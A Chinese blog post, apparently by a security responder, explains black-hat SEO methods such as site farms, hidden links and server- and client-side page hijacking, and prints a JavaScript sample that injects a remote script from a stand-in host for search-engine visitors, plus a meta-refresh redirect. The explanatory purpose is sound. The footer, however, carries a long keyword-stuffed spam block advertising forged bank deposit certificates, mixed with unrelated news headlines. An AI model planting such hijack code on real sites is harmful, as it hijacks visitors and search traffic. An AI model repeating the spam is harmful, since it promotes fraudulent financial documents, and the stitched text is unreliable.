黑帽SEO手法简介

首先得说黑帽SEO是个老话题,近期绿盟科技应急响应团队陆续接收到来自银监会的网络安全通报,通报指出CNCERT监测发现互联网存在大批量的疑似钓鱼网站,通过调查分析,发现这些为同一起 黑帽SEO事件。  由此总结一下黑帽SEO的常见手法,了解其套路,共同抵制。

黑帽seo概念

SEO全称为搜索引擎优化,是通过站内优化和站外优化的方式达到提成搜索引擎排名的目的。正规从事SEO职业的人被称为白帽SEO,指通过正规SEO手法,帮助提升站点排名的专业人员。
当然有白便会有黑,由于白帽SEO优化的过程将会十分漫长,一个新站想要获取好的排名,往往需要花上几年时间做优化推广。因此一些想要快速提升自身网站排名的小伙伴,便开始在SEO上研究作弊手法,从而诞生了黑帽SEO。黑帽SEO是指通过作弊手段,让站点快速提升排名的一类SEO技术,或者说是黑客技术,比如说:黑链(暗链)、站群、网站劫持(搜索引擎劫持)、桥页等,黑帽SEO能够快速提升排名,但毕竟是违规作弊行为,容易被K。

SEO的一些黑色手法

黑帽SEO的手法很多,并且在不断地更新换代,其中最常见的包括利用泛解析做站群,入侵高权重网站挂暗链,入侵高权重网站做网页劫持,篡改高权重网站网页内容,利用高权重网站二级目录做推广页面,修改nginx配置做目录反向代理等等。接下来介绍一些常用的手段。

利用泛解析建立泛二级域名站群

利用DNS泛解析可以快速建立站群,因为一个一级域名便可以衍生出无数个二级域名,当然一般需要借助站群工具,因为建立站群需要有很多内容不同的页面,手工建立显然不可能。而seo人员大费周章地建立站群的目的,便是能够快速吸引大量的搜索引擎爬虫,增加网站在搜索引擎中的收录量。
需要说明的是,二级域名并不是通过一条条dns解析记录去绑定的,解析里面设置的是*,也就是泛解析。而服务器端有程序或者代码去控制当构造不同的二级域名访问时,会返回不同的网页内容,也就让搜索引擎误认为每个二级域名都是一个单独的网站。
泛解析有很多优点,比如对用户友好(即使输错二级域名也能跳转到目标网站),又能够更快速地被搜索引擎收录等。基于这些优点,很多站长会选择用此方式来增加网站收录,然而如果没有妥善的使用泛解析可能会带来难以想象的危害。

 

利用网站暗链

暗链也称为黑链,即隐蔽链接 hidden links,是黑帽SEO的作弊手法之一。挂暗链的目的很简单,增加网站外链,提高网站排名;实现方式主要分为几种:利用CSS实现、利用JS实现、利用DIV+JS实现等。

利用高权重网站,构造关键词URL做推广

将URL中的参数内容显示到网页内,这原本是某些网页的一种特殊功能。黑客通过在url或者post数据包(常见于搜索框功能)中构造推广关键词,再将有推广关键词页面添加到蜘蛛池中,使搜索引擎收录就能达到推广的目的。

利用网页劫持引流

网页劫持,又叫网站劫持或者搜索引擎劫持,是目前黑帽SEO中最流行的一种做法。其原因可以简单概括为:易收录、难发现,易收录表现为搜索引擎尚没有很好的机制能够检测出此作弊手段,网页劫持手法仍然能够大量引流。难发现是指网页劫持手法比较隐蔽,一般非技术人员很难发现它的存在。
网页劫持从手法上可以分为服务端劫持、客户端劫持、百度快照劫持、百度搜索劫持等等;
网页劫持的表现形式可以是劫持跳转,也可以是劫持呈现的网页内容(与直接篡改网页内容不同),目前被广泛应用于私服、博彩等暴利行业。

服务端劫持

服务端劫持也称为全局劫持,此手法为修改网站动态语言文件,判断访问来源控制返回内容,从而达到网页劫持的目的。其特点往往是通过修改asp/aspx/php等后缀名文件,达到动态呈现网页内容的效果。
Global.asa、Global.asax、conn.asp、conn.php等文件比较特殊,作用是在每次执行一个动态脚本的时候,都会先加载该脚本,然后再执行目标脚本。所以只要在 Global.asa 中写判断用户系统信息的代码(访问来源等),如果是蜘蛛访问则返回关键词网页(想要推广的网站),如果是用户访问则返回正常页面。

客户端劫持

客户端劫持的手法也很多,但最常用的就两种:js劫持与Header劫持。

js劫持目的是通过向目标网页植入恶意js代码,控制网站跳转、隐藏页面内容、窗口劫持等。js植入手法是可以通过入侵服务器,直接写入源代码中;也可以写在数据库中,因为有些页面会呈现数据库内容。

js劫持代码案例:
以下代码可以使通过搜索引擎搜索的并点击页面时,执行一段js并跳转到博彩页面;而直接输入网址访问网页时,跳转到一个404页面。

1
2
3
4
5
6
7
8
9
10
11
today=new Date();
today=today.getYear()+“-“+(today.getMonth()+1)+“-“+today.getDate();
var regexp=/\.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(\.[a-z0-9\-]+){1,2}\//ig;
var where =document.referer;
if(regexp.test(where)){
document.write (‘<script language=”javascript” type=”text/javascript” src=”http://www.xxx.com/test.js”></script>’);
}
else
{
window.location.href=“../../404.htm”;
}

代码分析:通过referer判断来路,如果referer来路为空就是跳转到404页面,如果是搜索引擎来的referer里面也会有显示,然后在写代码控制跳转。如果只是控制实现显示不同的内容,可以修改php、asp代码;如果需要劫持搜索引擎搜索框,可以写JS代码来做浏览器本地跳转。当然js功能可以无限扩展,比如可以控制一个ip一天内第一次访问正常,其余访问跳转等等。

header劫持,就是在html代码的head中添加特殊标签,代码如下:

1
<meta http-equiv=“refresh” content=“10; url=http://thief.one”>

header劫持利用的就是Meta Refresh Tag(自动转向)功能将流量引走。

直接篡改网页内容(比较低级)

有些黑客在入侵网站后,喜欢直接篡改网页内容,比如放上自己的qq号,或者作为推广将网页篡改成非法页面。

利用高权重网站二级目录

即黑客入侵网站后,在网站二级目录下创建很多自己做推广的页面。为了达到引流的目的黑客往往需要建立大量的二级目录页面,因此需要用到寄生虫程序来自动化的创建页面。此手法也需要入侵高权重网站,获取网站服务器权限。与网页劫持手法不同的是,此手法侧重点在于利用高权重网站自身的优势,在其目录下创建多个推广页面;而网页劫持侧重隐藏自身,其可以做到动态呈现网页内容给客户。因此在实际使用中,黑客经常结合两者使用。此手法与利用泛解析做黑帽seo的手法还是有明显差异的,虽然同样是利用高权重网站本身的优势,但泛解析利用的是二级域名,而此手法利用的是二级目录,当然两者有异曲同工之妙。
总结到此,相信也对黑帽SEO有所了解,如有错误和不足,欢迎指出

(部分内容来源于网络)

Spread the word. Share this post!

Meet The Author

张, 凯

Leave Comment

代开银行存款证明公司常德定做留学存款证明鸡西资金证明订做沈阳订做企业资信证明黑河本地银行存款证明潍坊资金证明哪家专业鹤壁企业资金证明推荐嘉峪关出国留学存款证明查询泸州打银行定期存单焦作定期存单代做荆州银行定期存单样本宣城定做企业资信证明中卫资金证明哪里有青岛企业资信证明哪家好自贡打印出国留学存款证明乌鲁木齐打留学存款证明吉安出国留学资金证明用途德阳存款证明代做黄冈订做定期存单淮南出国留学存款证明定制阳江打企业资信证明宁波定制银行存款证明宝鸡企业资信证明怎么样贵港银行定期存单怎么打枣庄银行存款证明代办汕头出国留学存款证明哪家比较好宜春打印定期存单淮安留学存款证明代办玉林企业资金证明服务商鸡西留学存款证明哪里有钦州代办出国留学资金证明香港通过《维护国家安全条例》两大学生合买彩票中奖一人不认账让美丽中国“从细节出发”19岁小伙救下5人后溺亡 多方发声汪小菲曝离婚始末卫健委通报少年有偿捐血浆16次猝死单亲妈妈陷入热恋 14岁儿子报警雅江山火三名扑火人员牺牲系谣言手机成瘾是影响睡眠质量重要因素男子被猫抓伤后确诊“猫抓病”中国拥有亿元资产的家庭达13.3万户高校汽车撞人致3死16伤 司机系学生315晚会后胖东来又人满为患了男孩8年未见母亲被告知被遗忘张家界的山上“长”满了韩国人?倪萍分享减重40斤方法许家印被限制高消费网友洛杉矶偶遇贾玲何赛飞追着代拍打小米汽车超级工厂正式揭幕男子被流浪猫绊倒 投喂者赔24万沉迷短剧的人就像掉进了杀猪盘特朗普无法缴纳4.54亿美元罚金周杰伦一审败诉网易杨倩无缘巴黎奥运专访95后高颜值猪保姆德国打算提及普京时仅用姓名西双版纳热带植物园回应蜉蝣大爆发七年后宇文玥被薅头发捞上岸房客欠租失踪 房东直发愁“重生之我在北大当嫡校长”校方回应护栏损坏小学生课间坠楼当地回应沈阳致3死车祸车主疑毒驾事业单位女子向同事水杯投不明物质路边卖淀粉肠阿姨主动出示声明书黑马情侣提车了奥巴马现身唐宁街 黑色着装引猜测老人退休金被冒领16年 金额超20万张立群任西安交通大学校长王树国卸任西安交大校长 师生送别西藏招商引资投资者子女可当地高考胖东来员工每周单休无小长假兔狲“狲大娘”因病死亡外国人感慨凌晨的中国很安全恒大被罚41.75亿到底怎么缴考生莫言也上北大硕士复试名单了专家建议不必谈骨泥色变“开封王婆”爆火:促成四五十对测试车高速逃费 小米:已补缴天水麻辣烫把捣辣椒大爷累坏了

代开银行存款证明公司 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化